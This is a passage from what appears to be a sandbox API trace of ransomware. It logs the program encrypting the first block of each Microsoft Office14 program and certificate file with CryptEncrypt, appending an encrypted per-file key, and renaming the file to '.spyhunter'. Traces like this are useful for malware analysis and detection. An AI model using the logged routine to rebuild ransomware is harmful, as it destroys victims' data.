lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x57fb0c*, lpNumberOfBytesWritten=0x57facc*=0x4, lpOverlapped=0x0) returned 1 [0104.319] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57facc*=0x30, lpOverlapped=0x0) returned 1 [0104.319] CloseHandle (hObject=0x158) returned 1 [0104.785] GetProcessHeap () returned 0x2c0000 [0104.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0104.785] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACEDAO.DLL.spyhunter") returned 67 [0104.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACEDAO.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\acedao.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ACEDAO.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\acedao.dll.spyhunter")) returned 1 [0104.987] GetProcessHeap () returned 0x2c0000 [0104.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0104.987] GetProcessHeap () returned 0x2c0000 [0104.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0104.987] GetProcessHeap () returned 0x2c0000 [0104.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d4d8 | out: hHeap=0x2c0000) returned 1 [0104.987] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb10 | out: pbBuffer=0x57fb10) returned 1 [0104.987] GetProcessHeap () returned 0x2c0000 [0104.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0104.987] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb08*=0x30) returned 1 [0104.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0105.326] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE") returned 59 [0105.326] StrStrW (lpFirst="CNFNOT32.EXE", lpSrch=".txt") returned 0x0 [0105.326] GetProcessHeap () returned 0x2c0000 [0105.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.326] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57facc*=0x2800, lpOverlapped=0x0) returned 1 [0105.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.525] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57facc*=0x2800, lpOverlapped=0x0) returned 1 [0105.525] GetProcessHeap () returned 0x2c0000 [0105.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0105.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.525] WriteFile (in: hFile=0x158, lpBuffer=0x57fb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x57fb0c*, lpNumberOfBytesWritten=0x57facc*=0x4, lpOverlapped=0x0) returned 1 [0105.567] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57facc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57facc*=0x30, lpOverlapped=0x0) returned 1 [0105.568] CloseHandle (hObject=0x158) returned 1 [0105.568] GetProcessHeap () returned 0x2c0000 [0105.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0105.568] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE.spyhunter") returned 69 [0105.568] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CNFNOT32.EXE.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\cnfnot32.exe.spyhunter")) returned 1 [0105.569] GetProcessHeap () returned 0x2c0000 [0105.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0105.569] GetProcessHeap () returned 0x2c0000 [0105.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0105.569] GetProcessHeap () returned 0x2c0000 [0105.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e0d8 | out: hHeap=0x2c0000) returned 1 [0105.569] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb08 | out: pbBuffer=0x57fb08) returned 1 [0105.569] GetProcessHeap () returned 0x2c0000 [0105.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0105.569] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb00*=0x30) returned 1 [0105.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0105.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL") returned 59 [0105.606] StrStrW (lpFirst="FACILITY.DLL", lpSrch=".txt") returned 0x0 [0105.606] GetProcessHeap () returned 0x2c0000 [0105.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.607] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fac4*=0x2800, lpOverlapped=0x0) returned 1 [0105.635] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.635] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fac4*=0x2800, lpOverlapped=0x0) returned 1 [0105.636] GetProcessHeap () returned 0x2c0000 [0105.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.636] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.636] WriteFile (in: hFile=0x170, lpBuffer=0x57fb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x57fb04*, lpNumberOfBytesWritten=0x57fac4*=0x4, lpOverlapped=0x0) returned 1 [0105.663] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fac4*=0x30, lpOverlapped=0x0) returned 1 [0105.663] CloseHandle (hObject=0x170) returned 1 [0105.665] GetProcessHeap () returned 0x2c0000 [0105.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd57e8 [0105.665] wnsprintfW (in: pszDest=0x2cd57e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL.spyhunter") returned 69 [0105.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FACILITY.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\facility.dll.spyhunter")) returned 1 [0105.666] GetProcessHeap () returned 0x2c0000 [0105.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd57e8 | out: hHeap=0x2c0000) returned 1 [0105.666] GetProcessHeap () returned 0x2c0000 [0105.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0105.666] GetProcessHeap () returned 0x2c0000 [0105.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331ac0 | out: hHeap=0x2c0000) returned 1 [0105.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb08 | out: pbBuffer=0x57fb08) returned 1 [0105.666] GetProcessHeap () returned 0x2c0000 [0105.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0105.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb00*=0x30) returned 1 [0105.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll") returned 58 [0105.670] StrStrW (lpFirst="GKExcel.dll", lpSrch=".txt") returned 0x0 [0105.670] GetProcessHeap () returned 0x2c0000 [0105.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.670] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fac4*=0x2800, lpOverlapped=0x0) returned 1 [0105.672] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.672] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fac4*=0x2800, lpOverlapped=0x0) returned 1 [0105.672] GetProcessHeap () returned 0x2c0000 [0105.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0105.673] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.673] WriteFile (in: hFile=0xb4, lpBuffer=0x57fb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x57fb04*, lpNumberOfBytesWritten=0x57fac4*=0x4, lpOverlapped=0x0) returned 1 [0105.674] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fac4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fac4*=0x30, lpOverlapped=0x0) returned 1 [0105.674] CloseHandle (hObject=0xb4) returned 1 [0105.674] GetProcessHeap () returned 0x2c0000 [0105.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd57e8 [0105.674] wnsprintfW (in: pszDest=0x2cd57e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll.spyhunter") returned 68 [0105.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKExcel.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\gkexcel.dll.spyhunter")) returned 1 [0105.675] GetProcessHeap () returned 0x2c0000 [0105.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd57e8 | out: hHeap=0x2c0000) returned 1 [0105.675] GetProcessHeap () returned 0x2c0000 [0105.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0105.676] GetProcessHeap () returned 0x2c0000 [0105.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331c40 | out: hHeap=0x2c0000) returned 1 [0105.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb00 | out: pbBuffer=0x57fb00) returned 1 [0105.676] GetProcessHeap () returned 0x2c0000 [0105.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0105.676] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57faf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57faf8*=0x30) returned 1 [0105.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL") returned 54 [0105.676] StrStrW (lpFirst="GFX.DLL", lpSrch=".txt") returned 0x0 [0105.676] GetProcessHeap () returned 0x2c0000 [0105.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.677] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fabc*=0x2800, lpOverlapped=0x0) returned 1 [0105.717] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.717] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fabc*=0x2800, lpOverlapped=0x0) returned 1 [0105.718] GetProcessHeap () returned 0x2c0000 [0105.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0105.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.718] WriteFile (in: hFile=0xb4, lpBuffer=0x57fafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fabc, lpOverlapped=0x0 | out: lpBuffer=0x57fafc*, lpNumberOfBytesWritten=0x57fabc*=0x4, lpOverlapped=0x0) returned 1 [0105.720] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fabc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fabc*=0x30, lpOverlapped=0x0) returned 1 [0105.720] CloseHandle (hObject=0xb4) returned 1 [0105.720] GetProcessHeap () returned 0x2c0000 [0105.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce5800 [0105.721] wnsprintfW (in: pszDest=0x2ce5800, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL.spyhunter") returned 64 [0105.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GFX.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\gfx.dll.spyhunter")) returned 1 [0105.721] GetProcessHeap () returned 0x2c0000 [0105.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce5800 | out: hHeap=0x2c0000) returned 1 [0105.721] GetProcessHeap () returned 0x2c0000 [0105.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0105.722] GetProcessHeap () returned 0x2c0000 [0105.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0105.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faf8 | out: pbBuffer=0x57faf8) returned 1 [0105.840] GetProcessHeap () returned 0x2c0000 [0105.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0105.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57faf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57faf0*=0x30) returned 1 [0105.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0105.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer") returned 109 [0105.841] StrStrW (lpFirst="SignedComponents.cer", lpSrch=".txt") returned 0x0 [0105.841] GetProcessHeap () returned 0x2c0000 [0105.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.841] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fab4*=0x2de, lpOverlapped=0x0) returned 1 [0105.888] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffd22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.888] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fab4*=0x2de, lpOverlapped=0x0) returned 1 [0105.889] GetProcessHeap () returned 0x2c0000 [0105.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.889] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x16c, lpBuffer=0x57faf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x57faf4*, lpNumberOfBytesWritten=0x57fab4*=0x4, lpOverlapped=0x0) returned 1 [0105.889] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fab4*=0x30, lpOverlapped=0x0) returned 1 [0105.889] CloseHandle (hObject=0x16c) returned 1 [0105.889] GetProcessHeap () returned 0x2c0000 [0105.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0105.889] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer.spyhunter") returned 119 [0105.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer.spyhunter")) returned 1 [0105.890] GetProcessHeap () returned 0x2c0000 [0105.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0105.890] GetProcessHeap () returned 0x2c0000 [0105.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0105.890] GetProcessHeap () returned 0x2c0000 [0105.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37ba48 | out: hHeap=0x2c0000) returned 1 [0105.890] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faf8 | out: pbBuffer=0x57faf8) returned 1 [0105.890] GetProcessHeap () returned 0x2c0000 [0105.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0105.890] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57faf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57faf0*=0x30) returned 1 [0105.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0105.891] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer") returned 130 [0105.891] StrStrW (lpFirst="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", lpSrch=".txt") returned 0x0 [0105.891] GetProcessHeap () returned 0x2c0000 [0105.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.891] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fab4*=0x3ae, lpOverlapped=0x0) returned 1 [0106.031] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffc52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.032] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3ae, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fab4*=0x3ae, lpOverlapped=0x0) returned 1 [0106.032] GetProcessHeap () returned 0x2c0000 [0106.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.032] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.032] WriteFile (in: hFile=0x16c, lpBuffer=0x57faf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x57faf4*, lpNumberOfBytesWritten=0x57fab4*=0x4, lpOverlapped=0x0) returned 1 [0106.032] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fab4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fab4*=0x30, lpOverlapped=0x0) returned 1 [0106.032] CloseHandle (hObject=0x16c) returned 1 [0106.032] GetProcessHeap () returned 0x2c0000 [0106.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0106.032] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.spyhunter") returned 140 [0106.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer.spyhunter")) returned 1 [0106.033] GetProcessHeap () returned 0x2c0000 [0106.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0106.033] GetProcessHeap () returned 0x2c0000 [0106.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0106.033] GetProcessHeap () returned 0x2c0000 [0106.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c22680 | out: hHeap=0x2c0000) returned 1 [0106.033] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57faf0 | out: pbBuffer=0x57faf0) returned 1 [0106.033] GetProcessHeap () returned 0x2c0000 [0106.033] 